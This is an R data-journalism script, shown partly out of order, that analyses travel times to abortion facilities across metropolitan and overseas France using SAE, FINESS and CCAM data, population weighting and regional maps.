duree_tmp_2018<-matrix(ncol=2,nrow=iterations)
duree_tmp_1214<-matrix(ncol=2,nrow=iterations)
for(i in 1:iterations) {
# 2013
print(paste("Analysing for 2013 : ",df[i,1]," (",iterations-i," to go)",sep=""))
dist<-osrmTable(src=df[i,c("id", "x", "y")],dst=ivg13_dist[,c("FI","lon","lat")])
duree_tmp_2013[i,1]<-as.character(df[i,1])
duree_tmp_2013[i,2]=tryCatch({
as.numeric(apply(dist$durations,1,min))
},error= function(e) {
NA
})
# 2014
print(paste("Analysing for 2014 : ",df[i,1]," (",iterations-i," to go)",sep=""))
dist<-osrmTable(src=df[i,c("id", "x", "y")],dst=ivg14_dist[,c("FI","lon","lat")])
duree_tmp_2014[i,1]<-as.character(df[i,1])
duree_tmp_2014[i,2]=tryCatch({
as.numeric(apply(dist$durations,1,min))
},error= function(e) {
NA
})
# 2018
print(paste("Analysing for 2018 : ",df[i,1]," (",iterations-i," to go)",sep=""))
dist<-osrmTable(src=df[i,c("id", "x", "y")],dst=ivg18_dist[,c("FI","lon","lat")])
duree_tmp_2018[i,1]<-as.character(df[i,1])
duree_tmp_2018[i,2]=tryCatch({
as.numeric(apply(dist$durations,1,min))
},error= function(e) {
NA
})
# 12-14 (2018)
print(paste("Analysing for 2018 (12-14) : ",df[i,1]," (",iterations-i," to go)",sep=""))
dist<-osrmTable(src=df[i,c("id", "x", "y")],dst=ivg1214_dist[,c("FI","lon","lat")])
duree_tmp_1214[i,1]<-as.character(df[i,1])
duree_tmp_1214[i,2]=tryCatch({
as.numeric(apply(dist$durations,1,min))
},error= function(e) {
NA
})
}
duree_2013<-as.data.frame(duree_tmp_2013,stringsAsFactors=FALSE)
colnames(duree_2013) <- c("id", "val")
duree_2014<-as.data.frame(duree_tmp_2014,stringsAsFactors=FALSE)
colnames(duree_2014) <- c("id", "val")
duree_2018<-as.data.frame(duree_tmp_2018,stringsAsFactors=FALSE)
colnames(duree_2018) <- c("id", "val")
duree_1214<-as.data.frame(duree_tmp_1214,stringsAsFactors=FALSE)
colnames(duree_1214) <- c("id", "val")
duree<-cbind(duree_2013,duree_2014[2],duree_2018[2],duree_1214[2])
colnames(duree)<-c("code","d2013","d2014","d2018","d1214")
duree$d2013<-as.numeric(duree$d2013)
duree$d2014<-as.numeric(duree$d2014)
duree$d2018<-as.numeric(duree$d2018)
duree$d1214<-as.numeric(duree$d1214)
duree$diff<-duree$d2018-duree$d2013
duree$diff1214<-duree$d1214-duree$d2018
return(duree)
}
# France métrop.
duree_me<-fetchDurees("Metropole")
# Mayotte
duree_ma<-fetchDurees("Mayotte")
# La Réunion
duree_lr<-fetchDurees("Reunion")
# Guadeloupe
duree_ga<-fetchDurees("Guadeloupe")
# Martinique
duree_mt<-fetchDurees("Martinique")
# Guyane
duree_gy<-fetchDurees("Guyane")
duree<-rbind(duree_me,duree_ma,duree_lr,duree_ga,duree_mt,duree_gy)
#duree<-rbind(duree_ma,duree_lr,duree_ga,duree_mt,duree_gy)
## Croisement avec la population (rec. 2016 sauf Mayotte 2012)
pop2016<-read.csv("files/BTX_TD_POP1B_2016.csv",sep=";")
pop2016_ma<-read.csv("files/BTX_TD_POP1B_2012.csv",sep=";")
pop2016<-rbind.fill(pop2016,pop2016_ma)
colfap<-c("SEXE2_AGED100015","SEXE2_AGED100016","SEXE2_AGED100017","SEXE2_AGED100018","SEXE2_AGED100019","SEXE2_AGED100020","SEXE2_AGED100021","SEXE2_AGED100022","SEXE2_AGED100023","SEXE2_AGED100024","SEXE2_AGED100025","SEXE2_AGED100026","SEXE2_AGED100027","SEXE2_AGED100028","SEXE2_AGED100029","SEXE2_AGED100030","SEXE2_AGED100031","SEXE2_AGED100032","SEXE2_AGED100033","SEXE2_AGED100034","SEXE2_AGED100035","SEXE2_AGED100036","SEXE2_AGED100037","SEXE2_AGED100038","SEXE2_AGED100039","SEXE2_AGED100040","SEXE2_AGED100041","SEXE2_AGED100042","SEXE2_AGED100043","SEXE2_AGED100044","SEXE2_AGED100045","SEXE2_AGED100046","SEXE2_AGED100047","SEXE2_AGED100048","SEXE2_AGED100049","SEXE2_AGED100050")
colfap_2<-c("SEXE2_AGED100020","SEXE2_AGED100021","SEXE2_AGED100022","SEXE2_AGED100023","SEXE2_AGED100024","SEXE2_AGED100025","SEXE2_AGED100026","SEXE2_AGED100027","SEXE2_AGED100028","SEXE2_AGED100029","SEXE2_AGED100030","SEXE2_AGED100031","SEXE2_AGED100032","SEXE2_AGED100033","SEXE2_AGED100034","SEXE2_AGED100035")
pop2016$F_AP<-rowSums(pop2016[,colfap])
pop2016$F_AP2<-rowSums(pop2016[,colfap_2])
duree<-merge(duree,pop2016,by.x="code",by.y="CODGEO",all.x=TRUE)
write.csv(duree[,c("code","d2013","d2014","d2018","d1214","diff","diff1214","LIBGEO","F_AP","F_AP2")],"duree_ivg.csv",row.names=FALSE)
#duree<-read.csv("duree_ivg.csv",sep=",")
## FRANCE
tapply(duree$F_AP,cut(duree$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(duree$F_AP,cut(duree$d1214,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(duree$F_AP,cut(duree$diff,breaks=c(-60,-45,-30,-15,0,15,30,45,60),labels=c("-60m-45m","-45m-30m","-30m-15m","-15m0m","0m+15m","+15m+30m","+30m+45m","+45m+60m")),FUN=sum,na.rm=TRUE)
## Loiret
tapply(subset(duree,startsWith(duree$code,"45"))$F_AP,cut(subset(duree,startsWith(duree$code,"45"))$d2013,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"45"))$F_AP,cut(subset(duree,startsWith(duree$code,"45"))$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"45"))$F_AP,cut(subset(duree,startsWith(duree$code,"45"))$diff,breaks=c(-60,-45,-30,-15,0,15,30,45,60),labels=c("-60m-45m","-45m-30m","-30m-15m","-15m0m","0m+15m","+15m+30m","+30m+45m","+45m+60m")),FUN=sum,na.rm=TRUE)
###### moyenne dans le 45 ???
##### durée du trajet par commune * population par commune / population totale
sum(duree$d2018[startsWith(duree$code,"45")]*duree$F_AP[startsWith(duree$code,"45")])/sum(duree$F_AP[startsWith(duree$code,"45")])
## Loire-Atlantique
tapply(subset(duree,startsWith(duree$code,"44"))$F_AP,cut(subset(duree,startsWith(duree$code,"44"))$d2013,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"44"))$F_AP,cut(subset(duree,startsWith(duree$code,"44"))$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"44"))$F_AP,cut(subset(duree,startsWith(duree$code,"44"))$diff,breaks=c(-60,-45,-30,-15,0,15,30,45,60),labels=c("-60m-45m","-45m-30m","-30m-15m","-15m0m","0m+15m","+15m+30m","+30m+45m","+45m+60m")),FUN=sum,na.rm=TRUE)
###### moyenne dans le 44 ???
##### durée du trajet par commune * population par commune / population totale
sum(duree$d2018[startsWith(duree$code,"44")]*duree$F_AP[startsWith(duree$code,"44")])/sum(duree$F_AP[startsWith(duree$code,"44")])
## Pays-de-la-Loire
sapply(c("44","49","53","72","85"),function(x){tapply(subset(duree,startsWith(duree$code,x))$F_AP,cut(subset(duree,startsWith(duree$code,x))$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)})
sapply(c("44","49","53","72","85"),function(x){sum(duree$d2018[startsWith(duree$code,x)]*duree$F_AP[startsWith(duree$code,x)],na.rm=TRUE)/sum(duree$F_AP[startsWith(duree$code,x)],na.rm=TRUE)})
## Réalisation de cartes
write.csv(ivg_geo_2013,"ivg2013.csv")
write.csv(ivg_geo_2017,"ivg2017.csv")
write.csv(ivg_geo_2018,"ivg2018.csv")
coordinates(ivg_geo_2013)<- ~lon+lat
proj4string(ivg_geo_2013)<-CRS("+proj=longlat +datum=WGS84")
coordinates(ivg_geo_2018)<- ~lon+lat
proj4string(ivg_geo_2018)<-CRS("+proj=longlat +datum=WGS84")
drawRegion<-function(nom_reg,annee){
par(bg="#006994")
region<-france_1[france_1$NOM_REG==nom_reg,]
ivg_geo_2013<-spTransform(ivg_geo_2013,CRS(proj4string(france_r)))
ivg_geo_2018<-spTransform(ivg_geo_2018,CRS(proj4string(france_r)))
poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
plot(france_r,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
if(annee=="2013") {
choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="code",var="d2013",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
points(ivg_geo_2013,pch=15,cex=0.5,col="red")
}
else if(annee=="2018") {
choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="code",var="d2017",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
points(ivg_geo_2018,pch=15,cex=0.5,col="red")
}
points(coordinates(poi),pch=20,cex=0.5,col="white")
labelLayer(poi,poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
layoutLayer(title = paste(nom_reg,annee),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
dev.print(pdf,paste('cartes/',nom_reg,'_',annee,'.pdf',sep=""))
}
drawRegionMayotte<-function(){
par(bg="#006994")
region<-france_2
ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
choroLayer(spdf=region,spdfid="INSEE_COM",df=duree_ma,dfid="id",var="val.x",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
points(ivg_geo,pch=15,cex=0.5,col="red")
points(coordinates(poi),pch=20,cex=0.5,col="white")
labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=TRUE)
layoutLayer(title = paste("ACCÈS À L'IVG À MAYOTTE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
dev.print(pdf,'cartes/MAYOTTE.pdf')
}
drawRegionReunion<-function(){
par(bg="#006994")
region<-france_3
ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
choroLayer(spdf=region,spdfid="INSEE_COM",df=duree_lr,dfid="id",var="val.x",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
points(ivg_geo,pch=15,cex=0.5,col="red")
points(coordinates(poi),pch=20,cex=0.5,col="white")
labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
layoutLayer(title = paste("ACCÈS À L'IVG À LA RÉUNION"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
dev.print(pdf,'cartes/REUNION.pdf')
}
drawRegionGuadeloupe<-function(){
par(bg="#006994")
region<-france_4
ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="id",var="val.x",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
points(ivg_geo,pch=15,cex=0.5,col="red")
points(coordinates(poi),pch=20,cex=0.5,col="white")
labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
layoutLayer(title = paste("ACCÈS À L'IVG EN GUADELOUPE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
dev.print(pdf,'cartes/GUADELOUPE.pdf')
}
drawRegionMartinique<-function(){
par(bg="#006994")
region<-france_5
ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="id",var="val",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
points(ivg_geo,pch=15,cex=0.5,col="red")
points(coordinates(poi),pch=20,cex=0.5,col="white")
labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
layoutLayer(title = paste("ACCÈS À L'IVG EN MARTINIQUE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
dev.print(pdf,'cartes/MARTINIQUE.pdf')
}
drawRegionGuyane<-function(){
par(bg="#006994")
region<-france_6
ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="id",var="val",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
points(ivg_geo,pch=15,cex=0.5,col="red")
points(coordinates(poi),pch=20,cex=0.5,col="white")
labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
layoutLayer(title = paste("ACCÈS À L'IVG EN GUYANE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
dev.print(pdf,'cartes/GUYANE.pdf')
}
drawRegions<-function() {
drawRegionMayotte()
drawRegionReunion()
drawRegionGuadeloupe()
drawRegionMartinique()
drawRegionGuyane()
for(region in c("AUVERGNE-RHONE-ALPES","BOURGOGNE-FRANCHE-COMTE","BRETAGNE","CENTRE-VAL DE LOIRE","CORSE","GRAND EST","HAUTS-DE-FRANCE","ILE-DE-FRANCE","NORMANDIE","NOUVELLE-AQUITAINE","OCCITANIE","PAYS DE LA LOIRE","PROVENCE-ALPES-COTE D'AZUR")){
drawRegion(region,"2018")
}
}
drawRegions()
drawRegion("CENTRE-VAL DE LOIRE","2013")
drawRegion("CENTRE-VAL DE LOIRE","2017")
## Exports régionaux
extractRegion<- function(liste,nom) {
## Extraction SAE
ivg_local<-subset(ivg,departement %in% liste)
ivg_local<-ivg_local[,c("AN","rs","departement","libcategetab","IVG","IVGME","CONV","EFFPL","EFFPA","ETP","siret","nofinessej")]
colnames(ivg_local)<-c("Année","Nom","Département","Type d'établissement","Nombre d'IVG","Nombre d'IVG médicamenteuses","Conventions","Temps plein","Temps partiel","ETP moyens","Siret","Finess")
filename=paste("exports/sae_",nom,".csv",sep="")
write.csv(ivg_local,file=filename,row.names=FALSE)
## Extraction CCAM
ivg_local_ccam<-subset(ivg_ccam,departement %in% liste)
ivg_local_ccam<-ivg_local_ccam[,c("annee","rs","departement","libcategetab","ccam","nb_actes","siret","nofinessej")]
colnames(ivg_local_ccam)<-c("Année","Nom","Département","Type d'établissement","Type d'IVG","Nombre d'IVG","Siret","Finess")
filename_ccam=paste("exports/scansante_",nom,".csv",sep="")
write.csv(ivg_local_ccam,file=filename_ccam,row.names=FALSE)
print(paste(length(table(ivg_local$Nom))," établissements dans le SAE et ",length(table(ivg_local_ccam$Nom))," dans ScanSanté",sep=""))
}
| /acces-ivg/acces-ivg.R | no_license | alphoenix/donnees | R | false | false | 29,236 | r | ## Imports des librairies
library(haven)
library(plyr)
library(dplyr)
library(reshape)
library(devtools)
library(data.table)
library(cartography)
library(rgdal)
library(SpatialPosition)
library(xlsx)
library(osrm)
options(osrm.server="http://0.0.0.0:5000/")
## Chargement de la base sur les établissements
devtools::install_github('jomuller/finess',ref='47de6e2')
data(finess_geo, package = 'finess')
## Ajout des données de la Statistique annuelle des établissements (base statistique) 2013-2018
## http://www.data.drees.sante.gouv.fr/ReportFolders/reportFolders.aspx
datp2013<-read_sas("files/perinat_p_2013a.sas7bdat")
datp2014<-read_sas("files/perinat_p_2014a.sas7bdat")
datp2015<-read_sas("files/perinat_p_2015a.sas7bdat")
datp2016<-read_sas("files/perinat_p_2016a.sas7bdat")
datp2017<-read_sas("files/perinat_p_2017r.sas7bdat")
datp2018<-read_sas("files/perinat_p_2018.sas7bdat")
## Ajout du nombre de médecins participant à l'activité d'IVG (SAE/MIVG) mais les chiffres sont mauvais
mivg2013<-subset(datp2013,PERSO=="MIVG")
mivg2014<-subset(datp2014,PERSO=="MIVG")
mivg2015<-subset(datp2015,PERSO=="MIVG")
mivg2016<-subset(datp2016,PERSO=="MIVG")
mivg2017<-subset(datp2017,PERSO=="MIVG")
mivg2018<-subset(datp2018,PERSO=="MIVG")
mivg<-rbind(mivg2013,mivg2014,mivg2015,mivg2016,mivg2017,mivg2018)
names(mivg)[names(mivg) == "EFFPL"] <- "EFFPL_IVG"
names(mivg)[names(mivg) == "EFFPA"] <- "EFFPA_IVG"
names(mivg)[names(mivg) == "ETP"] <- "ETP_IVG"
mivg<-subset(mivg,select=-c(PERSO,GAR,GARDED,ASTDED,AST,BOR))
## Ajout du nombre de médecins gynécos (SAE/M2050)
mgy_2013<-subset(datp2013,PERSO=="M2050")
mgy_2014<-subset(datp2014,PERSO=="M2050")
mgy_2015<-subset(datp2015,PERSO=="M2050")
mgy_2016<-subset(datp2016,PERSO=="M2050")
mgy_2017<-subset(datp2017,PERSO=="M2050")
mgy_2018<-subset(datp2018,PERSO=="M2050")
mgy<-rbind(mgy_2013,mgy_2014,mgy_2015,mgy_2016,mgy_2017,mgy_2018)
names(mgy)[names(mgy) == "EFFPL"] <- "EFFPL_GY"
names(mgy)[names(mgy) == "EFFPA"] <- "EFFPA_GY"
names(mgy)[names(mgy) == "ETP"] <- "ETP_GY"
mgy<-subset(mgy,select=-c(PERSO,GAR,GARDED,ASTDED,AST,BOR))
mivg<-merge(mivg,mgy,by.x=c("AN","FI_EJ","FI"),by.y=c("AN","FI_EJ","FI"),all.x=TRUE,all.y=TRUE)
## Nombre d'actes IVG et accouchements (PERINAT / SAE)
dat2013<-read_sas("files/perinat_2013r.sas7bdat")
dat2014<-read_sas("files/perinat_2014r.sas7bdat")
dat2015<-read_sas("files/perinat_2015r.sas7bdat")
dat2016<-read_sas("files/perinat_2016r.sas7bdat")
dat2017<-read_sas("files/perinat_2017r.sas7bdat")
dat2018<-read_sas("files/perinat_2018.sas7bdat")
nivg<-rbind.fill(dat2014,dat2013,dat2015,dat2016,dat2017,dat2018)
## FICHIER FINAL
ivg<-merge(mivg,nivg,by.x=c("AN","FI_EJ","FI"),by.y=c("AN","FI_EJ","FI"),all.x=TRUE,all.y=TRUE)
## Ajout des infos de la base Finess
ivg<-merge(ivg,finess_geo,by.x="FI",by.y="nofinesset",all.x=TRUE)
## AJOUTS COLONNES
# Nombre d'accouchements (enfants morts-nés compris)
ivg$ACC<-ivg$ACCMU+ivg$ACCUN
# Département
ivg$DPT<-substr(ivg$FI,start=1,stop=2)
dpt_reg<-read.csv("files/departement2019.csv",sep=",",col.names=c("dep","reg","cheflieu","tncc","ncc","nccenr","libelle"))
ivg<-merge(ivg,dpt_reg,by.x="DPT",by.y="dep",all.x=TRUE)
## Renseigner les établissements sans info
finess_old<-read.csv("files/finess_old.csv",sep=";",col.names=c("nofinesset","nofinessej","rs","rslongue","complrs","compldistrib","numvoie","typvoie","voie","compvoie","lieuditbp","region","libregion","departement","libdepartement","cog","codepostal","libelle_routage","ligneacheminement","telephone","telecopie","categetab","libcategetab","liblongcategetab","categretab","libcategretab","siret","codeape","libcodeape","mft","libmft","liblongmft","sph","libsph","numen","coordx","coordy","sourcegeocod","dategeocod","dateautor","dateouvert","datemaj","lat","lon"),stringsAsFactors=FALSE,colClasses=c(rep("character",44)))
ivg$rs[is.na(ivg$lat)]<-finess_old$rs[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lat))]
ivg$departement[is.na(ivg$lat)]<-finess_old$departement[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lat))]
ivg$lat[is.na(ivg$lat)]<-finess_old$lat[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lat))]
ivg$lon[is.na(ivg$lon)]<-finess_old$lon[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lon))]
## EXPORT
write.csv(ivg,file="ivg.csv",row.names = FALSE)
## Nettoyage
rm(mivg2013,mivg2014,mivg2015,mivg2016,mivg2017,mivg2018)
rm(mgy_2013,mgy_2014,mgy_2015,mgy_2016,mgy_2017,mgy_2018)
rm(datp2013,datp2014,datp2015,datp2016,datp2017,datp2018)
rm(dat2013,dat2014,dat2015,dat2016,dat2017,dat2018)
rm(nivg,mivg,mgy)
## Nb. établissements 12-14 (SAE)
ivg %>% filter(IVG1214 > 0 & AN == "2018") %>% nrow
ivg %>% filter(IVG-IVGME > 0 & AN == "2018") %>% nrow
ivg %>% filter(IVG > 0 & AN == "2018") %>% nrow
ivg %>% filter(IVG1214 > 0 & AN == "2018") %>% cast(libcategetab~AN,length,value="IVG1214") %>% View
ivg %>% filter(IVG-IVGME > 0 & AN == "2018") %>% cast(libcategetab~AN,length,value="IVG") %>% View
ivg %>% filter(IVG > 0 & AN == "2018") %>% cast(libcategetab~AN,length,value="IVG") %>% View
### Taux d'IVG médicamenteuses (moins de 5% / moins que moyenne / plus que moyenne / exclu. +95%)
### Moyenne : 0,5416
ivg$tx_me<-ivg$IVGME/ivg$IVG
ivg$tx_me[is.infinite(ivg$tx_me)]<-1
sum(ivg$IVGME[ivg$AN == "2017"],na.rm=TRUE)/sum(ivg$IVG[ivg$AN == "2018"],na.rm=TRUE)
mean(ivg$tx_me[ivg$AN == "2017"],na.rm=TRUE)
### Taux d'IVG tardives (12-14) (aucune / peu / moyenne)
### Moyenne : 0,0761
ivg$tx_1214<-ivg$IVG1214/ivg$IVG
sum(ivg$IVG1214[ivg$AN == "2017"],na.rm=TRUE)/sum(ivg$IVG[ivg$AN == "2018"],na.rm=TRUE)
mean(ivg$tx_1214[ivg$AN == "2017"],na.rm=TRUE)
### Évolution 2013-2018 (IVG en hausse // stable // déroute)
ivg_export <- ivg %>% filter(AN == "2013" | AN == "2017") %>% group_by(FI) %>% arrange(AN, .by_group = TRUE) %>% mutate(ivg_change = (IVG/lag(IVG) - 1)) %>% mutate(acc_change = (ACC/lag(ACC) - 1)) %>% filter(AN == "2017")
ivg_export$cat_evol<-cut(ivg_export$ivg_change,breaks=c(-1.01,1,-0.05,0.05,13),labels=c("arrêt","en chute","stable","en hausse"),right=TRUE)
### EXPORT
write.csv(ivg_export[,c("FI","DPT","ligneacheminement","rs","libcategetab","IVG","IVGME","IVG1214","ACC","ivg_change","acc_change","cat_evol","tx_me","cat_medic","tx_1214","cat_1214","lat","lon")],"exports/ivg_export.csv",na="",row.names=FALSE)
## Exports étab. 2018
result<-ivg %>% filter(AN == "2013" | AN == "2018") %>% group_by(FI) %>% arrange(AN, .by_group = TRUE) %>% mutate(ivg_change = (IVG/lag(IVG) - 1)) %>% mutate(acc_change = (ACC/lag(ACC) - 1)) %>% filter(AN == "2018")
write.csv(result[,c("FI","DPT","ligneacheminement","rs","libcategetab","IVG","IVGME","ivg_change","acc_change")],"exports/change.csv",na="",row.names=FALSE)
write.csv(merge(subset(ivg_ccam,annee == "2018"),ivg[,c("FI","AN","IVG","IMG")],by.x=c("finess_geo","annee"),by.y=c("FI","AN"),all.x=TRUE)[,c("annee","finess_geo","dep","ligneacheminement","rs","libcategetab","nb_actes.c","nb_actes.m","nb_actes.img2","nb_actes.acc","tx","IVG","IMG")],"exports/ccam.csv",na="",row.names=FALSE)
write.csv(merge(subset(ivg_ccam,annee == "2017"),ivg[,c("FI","AN","IVG","IMG")],by.x=c("finess_geo","annee"),by.y=c("FI","AN"),all.x=TRUE)[,c("annee","finess_geo","dep","ligneacheminement","rs","libcategetab","nb_actes.c","nb_actes.m","nb_actes.img2","nb_actes.acc","tx","IVG","IMG")],"exports/ccam17.csv",na="",row.names=FALSE)
write.csv(subset(ivg[,c("AN","FI","DPT","ligneacheminement","rs","libcategetab","IVG","IVGME","IVG1214","lat","lon")],AN=="2018"),"exports/sae.csv",na="",row.names=FALSE)
## Nombre d'actes (base PMSI-CCAM)
## https://www.scansante.fr/open-ccam/open-ccam-2017
read_ivgCCAM <- function(year) {
filename = paste("files/open_ccam_",year,".csv",sep="")
if(year < 18) {
ccam<-read.csv(filename,sep=";",col.names=c("finess","finess_geo","ccam","nb_actes","dms","nb_sej_0_nuit","dep","reg"))
ccam<-subset(ccam,select=-c(dms,nb_sej_0_nuit))
}
else {
ccam<-read.csv(filename,sep=";",col.names=c("finess","finess_geo","ccam","nb_sejsea","nb_actes","dms","nb_sej_0_nuit","nb_actes_ambu","dep","reg"))
ccam<-subset(ccam,select=-c(nb_sejsea,dms,nb_sej_0_nuit,nb_actes_ambu))
}
## Subsets avortements
ivg_ccamc<-subset(ccam,ccam=="JNJD0020") ## Évacuation d'un utérus gravide par aspiration et/ou curetage, au 1er trimestre de la grossesse
ivg_ccamm<-subset(ccam,ccam=="JNJP0010") ## Évacuation d'un utérus gravide par moyen médicamenteux, au 1er trimestre de la grossesse
ivg_ccamimg<-subset(ccam,ccam=="JNJD0010") ## Évacuation d'un utérus gravide, au 2ème trimestre de la grossesse avant la 22ème semaine d'aménorrhée
# Merge
ivg_ccam<-merge(ivg_ccamc,ivg_ccamm,by.x=c("finess","finess_geo","dep","reg"),by.y=c("finess","finess_geo","dep","reg"),all.x=TRUE,all.y=TRUE,suffix=c(".c",".m"))
ivg_ccam<-merge(ivg_ccam,ivg_ccamimg,by.x=c("finess","finess_geo","dep","reg"),by.y=c("finess","finess_geo","dep","reg"),all.x=TRUE,all.y=TRUE)
setnames(ivg_ccam,c("ccam","nb_actes"),c("ccam.img2","nb_actes.img2"))
## Subsets accouchements
## JQGD001, JQGD002, JQGD003, JQGD004, JQGD005, JQGD007, JQGD008, JQGD012, JQGD013, JQGA002, JQGA003, JQGA004, JQGA005, JQGD010
ivg_acc<-subset(ccam,ccam %in% c("JQGD0010","JQGD0020","JQGD0030","JQGD0040","JQGD0050","JQGD0070","JQGD0080","JQGD0120","JQGD0130","JQGA0020","JQGA0030","JQGA0040","JQGA0050","JQGD0100"))
ivg_acc<-aggregate(ivg_acc$nb_actes,list(ivg_acc$finess_geo),sum,na.rm=TRUE)
colnames(ivg_acc)<-c("finess_geo","nb_actes.acc")
ivg_ccam<-merge(ivg_ccam,ivg_acc,by.x="finess_geo",by.y="finess_geo")
## Ajout année
ivg_ccam["annee"]<-paste("20",year,sep="")
ivg_ccam<-subset(ivg_ccam,select=-c(ccam.c,ccam.m,ccam.img2))
return(ivg_ccam)
}
ivg_ccam<-purrr::map_df(c("15","16","17","18"),read_ivgCCAM)
ivg_ccam$nb_actes<-rowSums(ivg_ccam[,c("nb_actes.c","nb_actes.m")],na.rm=TRUE)
ivg_ccam<-merge(ivg_ccam,finess_geo,by.x="finess_geo",by.y="nofinesset",all.x=TRUE)
dpt_reg<-read.csv("files/departement2019.csv",sep=",",col.names=c("dep","reg","cheflieu","tncc","ncc","nccenr","libelle"))
ivg_ccam<-merge(ivg_ccam,dpt_reg,by.x=c("dep","reg"),by.y=c("dep","reg"),all.x=TRUE)
in.dir<- ("geo")
## FRANCE METROP.
france_1<-readOGR(in.dir,layer="COMMUNE_1",verbose=FALSE)
france_r<-readOGR(in.dir,layer="REGION_1",verbose=FALSE)
## MAYOTTE
france_2<-readOGR(in.dir,layer="COMMUNE_2",verbose=FALSE)
## LA RÉUNION
france_3<-readOGR(in.dir,layer="COMMUNE_3",verbose=FALSE)
## GUADELOUPE
france_4<-readOGR(in.dir,layer="COMMUNE_4",verbose=FALSE)
## MARTINIQUE
france_5<-readOGR(in.dir,layer="COMMUNE_5",verbose=FALSE)
## GUYANE
